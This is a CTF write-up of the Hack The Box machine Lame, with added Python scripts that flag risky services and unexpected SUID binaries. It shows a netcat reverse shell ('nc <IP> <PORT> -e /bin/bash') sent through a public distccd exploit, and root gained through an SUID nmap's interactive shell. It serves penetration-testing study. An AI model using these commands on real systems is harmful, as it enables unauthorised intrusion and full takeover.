Hack The Box — Lame — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
3 min read · Apr 21, 2023


This is my 5th write-up, this time for Lame, a machine from TJNull's list of HackTheBox machines for OSCP practice. The full list can be found here.

In a general penetration test or a CTF, there are usually three major phases:

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

In order to hack into a system we first need to gather some information about it. For that, we use Nmap to scan the ports of the target machine and find out which services are running, since those services are what we can target.

nmap -sC -sV -A -T4 -p- 10.129.195.133

  • -sC runs the default NSE scripts to enumerate the discovered services further.
  • -sV performs version detection on the services.
  • -A enables aggressive scanning (OS detection, version detection, script scanning and traceroute); not usually recommended in a real environment.
  • -T4 selects the aggressive timing template, which speeds the scan up by sending probes more in parallel.
  • -p- scans the full port range, 1–65535.

[screenshot: nmap scan output]
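Reading a full -p- scan by eye is error-prone, and the point of the enumeration step is to spot the risky service (here distccd, and the old Samba) quickly. The following is an added example, not part of the original write-up: a small parser for Nmap's grepable (-oG) output that lists the open services and flags the two the write-up singles out. The sample scan text is constructed for the example (only the ports and versions the write-up mentions, plus a generic ssh entry), so it is not the real scanner output for the box.

```python
import re
from dataclasses import dataclass

# Constructed sample in Nmap grepable (-oG) format. Real output separates the
# Host/Ports/Ignored State fields with tabs; the parser below tolerates either.
SAMPLE_GNMAP = """# Nmap scan (constructed sample, not real scanner output)
Host: 10.129.195.133 ()  Status: Up
Host: 10.129.195.133 ()  Ports: 22/open/tcp//ssh//OpenSSH (version unknown)/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, 445/open/tcp//netbios-ssn//Samba smbd 3.0.20-Debian/, 3632/open/tcp//distccd//distccd v1/  Ignored State: closed (65531)
"""


@dataclass
class Service:
    host: str
    port: int
    proto: str
    name: str
    version: str


def parse_gnmap(text):
    """Return the open services from grepable Nmap output.

    Each entry in the Ports: field has the shape
    port/state/protocol/owner/service/rpc info/version/
    """
    services = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("Ignored State:")[0].strip()
        for entry in ports_field.split(", "):
            fields = entry.split("/")
            if len(fields) < 7 or fields[1] != "open":
                continue
            services.append(Service(host, int(fields[0]), fields[2],
                                    fields[4], fields[6].strip()))
    return services


# Review rules: (service name, version pattern or None, finding text).
# distccd should never be reachable from an untrusted network at all; the
# Samba rule matches the exact version the write-up calls out.
RULES = [
    ("distccd", None,
     "distccd exposed: CVE-2004-2687 gives unauthenticated command execution; "
     "restrict with distccd --allow or a firewall, or do not expose it"),
    ("netbios-ssn", re.compile(r"Samba.*3\.0\.20"),
     "Samba 3.0.20: known remote code execution exploit; upgrade"),
]


def review(services):
    """Return (host, port, finding) tuples for services matching a rule."""
    findings = []
    for svc in services:
        for name, pattern, message in RULES:
            if svc.name == name and (pattern is None or pattern.search(svc.version)):
                findings.append((svc.host, svc.port, message))
    return findings


if __name__ == "__main__":
    for svc in parse_gnmap(SAMPLE_GNMAP):
        print(f"{svc.host}:{svc.port}/{svc.proto} {svc.name} {svc.version}")
    for host, port, message in review(parse_gnmap(SAMPLE_GNMAP)):
        print(f"FINDING {host}:{port} {message}")
```

Run the real scan with an extra -oG lame.gnmap and feed that file to parse_gnmap instead of the constructed sample; the rule table is the place to record any other version with a known exploit as you come across it.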

Initial foothold

Interestingly enough, distccd is running on port 3632. This was a new service for me, so I chose to research this one instead of Samba 3.0.20, which has a famous exploit.

Looking up distccd on Google, I found:

Distcc is a tool for speeding up compilation of source code by using distributed computing over a computer network. With the right configuration, distcc can dramatically reduce a project’s compilation time.

So, I went on to search for an exploit. After a little searching I came across this exploit for CVE-2004-2687 on GitHub:

https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

After downloading the script and executing it, it showed me the usage syntax.

[screenshot: usage syntax]

Let’s put all the arguments and re-run it.

[screenshot: command execution]

And I was able to execute the commands.

I tried a bash reverse shell first, but it didn't work. So I checked whether netcat was installed on the target.

[screenshot: netcat present on the target]

Netcat was installed. Getting a shell was easy afterwards: start a listener and pass "nc <IP> <PORT> -e /bin/bash" as the command argument to the exploit.

[screenshot: getting a shell]

And we have a shell as daemon.

[screenshot: initial shell]

Let’s collect the user flag.

[screenshot: user.txt]

Privilege Escalation

First I checked which programs I could run with sudo and didn't find anything. Then I looked for SUID files.

find / -perm -u=s -type f 2>/dev/null

[screenshot: SUID files]

And I found that nmap had the SUID bit set, so it runs as root.

So all I did was start nmap in interactive mode and invoke a shell from there.

nmap --interactive

nmap> !sh

[screenshot: root shell]

And I got a root shell! Then I collected the root flag.
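The root of this escalation is a SUID binary that has no business being SUID. The check a defender (or a pentester writing the finding up) wants is not "list all SUID files" but "which SUID files are not in the known-good set for this build". Below is an added example, not code from the write-up: it takes the output of the same find command used above, compares it against an allowlist of SUID binaries, and reports the extras. The allowlist is an illustrative assumption for a Debian/Ubuntu base system, and the sample find output is constructed; a real baseline should be captured from a clean reference host of the same build. The scan_suid helper does the live filesystem walk for hosts where find is unavailable.

```python
import os
import stat

# ASSUMPTION: illustrative allowlist of SUID binaries a Debian/Ubuntu base
# install normally ships. Replace with `find / -perm -u=s -type f` captured
# on a clean reference host of the same build.
BASELINE_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
}

# Constructed sample of `find / -perm -u=s -type f 2>/dev/null` output.
# /usr/bin/nmap is the odd one out, as on the box in the write-up.
SAMPLE_FIND_OUTPUT = """/bin/su
/bin/mount
/bin/umount
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/nmap
/usr/bin/chsh
"""


def parse_find_output(text):
    """One path per line, blank lines ignored."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def unexpected_suid(paths, baseline=BASELINE_SUID):
    """Return the SUID paths that are not in the baseline, sorted."""
    return sorted(p for p in paths if p not in baseline)


def scan_suid(root="/"):
    """Live equivalent of `find ROOT -perm -u=s -type f`: regular files
    with the set-user-ID bit. Unreadable directories are skipped."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


if __name__ == "__main__":
    for path in unexpected_suid(parse_find_output(SAMPLE_FIND_OUTPUT)):
        print(f"UNEXPECTED SUID: {path}")
```

On the box the report would contain exactly one line, /usr/bin/nmap; the fix is chmod u-s on it (the interactive mode used above exists only in old nmap releases, but an SUID-root copy of any general-purpose tool is a finding regardless of version). Run scan_suid() as the audit source on a host where you want the live view rather than a pasted find listing.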

[screenshot: root.txt]

EZ! :)
